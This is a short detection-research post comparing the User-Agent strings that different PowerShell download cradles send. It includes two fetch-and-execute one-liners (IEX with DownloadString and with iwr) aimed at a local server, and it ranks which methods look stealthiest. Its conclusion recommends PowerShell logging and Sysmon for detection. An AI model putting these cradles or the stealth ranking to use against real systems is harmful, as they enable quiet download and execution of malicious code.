Taking a Closer Look at PowerShell Download Cradles
A Twitter discussion emerged regarding PowerShell download cradles and their associated User Agents. I decided to investigate this topic using intrusion detection systems.
Methodology
I obtained a list from HarmJ0y’s GitHub repository and tested various methods by hosting a benign PowerShell script on a local web server. I employed the SELKS IDS distribution to analyze the User Agents generated by different download techniques.
Findings
| Command | User-Agent |
|---|---|
IEX (New-Object Net.Webclient).downloadstring("http://192.168.1.116/hey.ps1") | No User Agent |
IEX (iwr 'http://192.168.1.116/hey.ps1') | Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.483 |
| Internet Explorer COM object method | N/A – Couldn’t get this one to work |
Msxml2.XMLHTTP method | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E) |
WinHttp.WinHttpRequest.5.1 method | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) |
| BITS transfer method | Microsoft BITS/7.8 |
| XML document loading method | No User Agent |
Key Observations
From a stealth point of view, at least when looking at User Agents, the first and last methods on the chart seem more stealthy.
Testing was conducted on Windows 10 with PowerShell version 5.1.15063.483 and latest updates.
Conclusion
Detection should rely on PowerShell logging + Sysmon rather than User Agent analysis alone, as methods don’t produce unique identifying signatures detectable at the network level.